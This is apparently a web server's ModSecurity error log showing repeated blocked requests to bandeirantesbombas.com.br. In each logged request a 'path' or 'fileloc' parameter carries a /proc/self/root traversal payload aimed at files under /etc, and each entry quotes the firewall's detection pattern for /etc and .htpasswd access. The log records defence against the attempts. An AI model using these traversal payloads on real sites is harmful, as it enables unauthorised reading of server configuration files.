https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:28:25.756081 2026] [:error] [pid 2160:tid 140411641214720] [client 74.7.241.46:53490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzGTjrdei6i7MVRTDT9AAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:28:28.504218 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.203:49554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzHKt8Nd0UC_OcbVHCjwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:28:33.117063 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.46:53506] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzIKBJNF7axNlVR0UODgAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:28:35.386910 2026] [:error] [pid 2160:tid 140411599251200] [client 74.7.243.203:39764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzIzjrdei6i7MVRTDT-QAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:28:44.690708 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:54352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzLAeiSKl8TjouI-YScgAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:28:51.542965 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.243.203:46842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzM64xEDsg_V3ESNZDQAAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:41.967563 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.243.203:46844] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzZdCmCSWTlPouqorc2gAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:44.355085 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.203:42884] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzaAeiSKl8TjouI-YSegAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:56.320979 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.46:42290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzdL-sgTmmJoPuMdyu7wAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:56.863372 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.241.46:42290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzdL-sgTmmJoPuMdyu8AAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:56.987037 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:42896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzdKBJNF7axNlVR0UOIAAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:57.514466 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:42896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzdaBJNF7axNlVR0UOIQAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:29:59.354098 2026] [:error] [pid 2160:tid 140411708356352] [client 74.7.243.203:52606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzdjjrdei6i7MVRTDUFgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:06.786582 2026] [:error] [pid 9155:tid 140411590858496] [client 74.7.243.203:60128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzftbI7zhHXcabyMU3RgAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:07.290825 2026] [:error] [pid 9155:tid 140411699963648] [client 74.7.243.203:60128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzf9bI7zhHXcabyMU3RwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:16.027380 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.46:42290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablziL-sgTmmJoPuMdyu-gAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:26.325066 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.243.203:37172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzkq4xEDsg_V3ESNZDVQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:26.882723 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:37172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzkq4xEDsg_V3ESNZDVgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:27.963884 2026] [:error] [pid 9155:tid 140411574073088] [client 74.7.241.46:37640] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzk9bI7zhHXcabyMU3UgAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:30:32.231182 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.243.203:39984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzmBj0p0SRWAqcjGFxyAAAAwY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:32.304652 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.46:50570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzmBj0p0SRWAqcjGFxyQAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:30:33.503939 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.241.46:50584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzmat8Nd0UC_OcbVHC_AAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
